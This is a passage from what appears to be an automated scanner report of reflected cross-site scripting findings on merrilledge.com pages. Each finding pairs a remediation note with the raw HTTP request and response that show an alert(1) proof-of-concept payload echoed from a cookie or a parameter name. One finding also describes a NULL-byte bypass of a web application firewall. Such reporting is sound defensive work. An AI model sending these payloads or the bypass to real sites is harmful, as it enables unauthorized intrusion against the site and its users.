Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the BOA_ADVISOR cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b95f5'%3balert(1)//6456dbde085 was submitted in the BOA_ADVISOR cookie. This input was echoed as b95f5';alert(1)//6456dbde085 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the state cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f40ce'%3balert(1)//6eecdf0a777 was submitted in the state cookie. This input was echoed as f40ce';alert(1)//6eecdf0a777 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c3f6'-alert(1)-'234285bfe68 was submitted in the pxs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /m/pages/general-investing.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B872187c3f6'-alert(1)-'234285bfe68; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 88635
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- start content ...[SNIP]...
2.93. http://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008779e"><script>alert(1)</script>b92de939882 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8779e"><script>alert(1)</script>b92de939882 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/home.aspx?%008779e"><script>alert(1)</script>b92de939882=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 21:00:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: https://www.merrilledge.com/m/pages/home.aspx?%008779e%22%3E%3Cscript%3Ealert(1)%3C/script%3Eb92de939882=1 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 94733
The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6436'-alert(1)-'4c9ea08991f was submitted in the pxs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /m/pages/home.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218d6436'-alert(1)-'4c9ea08991f; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 24 Nov 2010 21:00:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: https://www.merrilledge.com/m/pages/home.aspx Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 94560
The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 700c6'-alert(1)-'e2c44da28ca was submitted in the pxs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /m/pages/merrill-edge-advisory-center.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218700c6'-alert(1)-'e2c44da28ca; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 83977
The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df059'-alert(1)-'97bea92029d was submitted in the pxs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /m/pages/pricing.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218df059'-alert(1)-'97bea92029d; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:01:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 67177
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><!-- Thank you for using ...[SNIP]... <![CDATA[ lpAddVars('page','section','MLEdge'); lpAddVars('page','ConversionStage','pricing'); lpAddVars('page','Site ID','OSE'); lpAddVars('page','Session ID','F05EFCF5-9B2D-479B-B538-321495B87218df059'-alert(1)-'97bea92029d'); Sys.Application.initialize(); Sys.Application.add_init(function() { $create(MerrillLynch.Application.Online.MicroSite.GlobalNavigation.RenderMenu, null, null, null, $get("ctl00_nmMenu1"));
The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c9e5'-alert(1)-'afe53c5ee94 was submitted in the pxs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /m/pages/products-and-solutions.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B872185c9e5'-alert(1)-'afe53c5ee94; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 91380
The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b6a9'-alert(1)-'55b9ac87b55 was submitted in the pxs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /m/pages/self-directed-investing.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B872183b6a9'-alert(1)-'55b9ac87b55; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 90933
The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a87f'-alert(1)-'59fa20fb07f was submitted in the pxs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /m/pages/why-merrill-edge.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B872185a87f'-alert(1)-'59fa20fb07f; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 91386
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- start content ...[SNIP]...
The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa689'-alert(1)-'331a972a096 was submitted in the pxs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /m/pages/zero-dollar-trades.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218aa689'-alert(1)-'331a972a096; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:00:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 63533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><!-- Thank you for using ...[SNIP]... lpAddVars('page','section','MLEdge'); lpAddVars('page','ConversionStage','zero-dollar-trades'); lpAddVars('page','Site ID','OSE'); lpAddVars('page','Session ID','F05EFCF5-9B2D-479B-B538-321495B87218aa689'-alert(1)-'331a972a096'); Sys.Application.initialize(); Sys.Application.add_init(function() { $create(MerrillLynch.Application.Online.MicroSite.GlobalNavigation.RenderMenu, null, null, null, $get("ctl00_nmMenu1"));
The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1bb3'-alert(1)-'298a24f0965 was submitted in the pxs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /M/pages/home.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=F05EFCF5-9B2D-479B-B538-321495B87218a1bb3'-alert(1)-'298a24f0965; SMIDENTITY=v52Qt308UD1a2quLUSvZEH3VpNOZrVki4Tgn7eb9/zpMf4owJ6F6eCR0dcQmF4mUgkb8nprUJ6YN6gJ4G4fg5DTu2sMKTW34NwlUlqrUNKjYwnU5ZEU2N846eswBPw2P/0ecTaZl+HlLhGiUoAn3xmZOZj5LtNCR8NZ06F0Bgzgq1IvIg831q3QnnDX3iA0EC4H13Sfm+VHP409ES+5Nuo/i2Lz6HGDSrOKoxbCw9QBr2KMfU53oT3FhRoOzJLMlbsRlyu3W1xlYRWs2d2ul3pGIBPD2dYHN683ehSMeuKNAjD8nszjctRcWvJXe6gICFE8aguanDD997fpt3x8vBr1VuMhTcqGoU0Ux8IsE2FtQ2gEMpMEXPW+DXuQkn7TCixNe7LcdPy4m1Ie0FxW/FdbtphDkh4Zl2uO6YpNUHlaz9k7uqUJGdrdm4qJAZCh132bYeebO2kJuOptF+mjFMJGrceyisyHj308DUd+AAOO8XgCglPEP5oq5aISb051KHZRy6qyuW/egypwYiFDvjiYbFreCmzFrj4JxwJG2+gGWqH29gbMNJkLS9qMCu9bz15Rav9t94kZOlDRqnZmvtBC9bhdftfVCpQpfS61mMmLBxhs4CYuJKSrbGEevugDg; pxv=5AA68BA2-39A2-44FF-8763-B60C8B7FDDBF; CMAVID=none; cmTPSet=Y;
Response
HTTP/1.1 200 OK Date: Wed, 24 Nov 2010 21:01:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 94720